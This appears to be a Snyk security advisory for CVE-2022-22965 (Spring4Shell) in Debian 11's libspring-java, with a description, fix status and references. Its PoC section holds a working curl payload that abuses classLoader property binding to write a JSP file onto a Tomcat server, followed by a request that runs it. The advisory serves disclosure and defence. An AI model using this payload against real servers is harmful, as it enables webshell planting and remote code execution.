Remote Code Execution Affecting libspring-java package, versions *
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-DEBIAN11-LIBSPRINGJAVA-2438311
- published 1 Apr 2022
- disclosed 1 Apr 2022
Introduced: 1 Apr 2022
CVE-2022-22965 Open this link in a new tabHow to fix?
There is no fixed version for Debian:11 libspring-java.
NVD Description
Note: Versions mentioned in the description apply only to the upstream libspring-java package and not the libspring-java package as distributed by Debian.
See How to fix? for Debian:11 relevant fixed versions and status.
via manipulation of ClassLoader that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application.
Note: Current public exploits require victim applications to be built with JRE version 9 (or above) and to be packaged as a WAR file that is deployed to Tomcat. However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well.
PoC
1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0
2/ ./mvnw install
3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps
4/ curl -X POST \
-H "pre:<%" \
-H "post:;%>" \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \
http://localhost:8888/handling-form-submission-complete/greeting
5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp
References
- https://security-tracker.debian.org/tracker/CVE-2022-22965
- http://packetstormsecurity.com/files/166713/Spring4Shell-Code-Execution.html
- http://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005
- https://tanzu.vmware.com/security/cve-2022-22965
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/cves/2022/CVE-2022-22965.yaml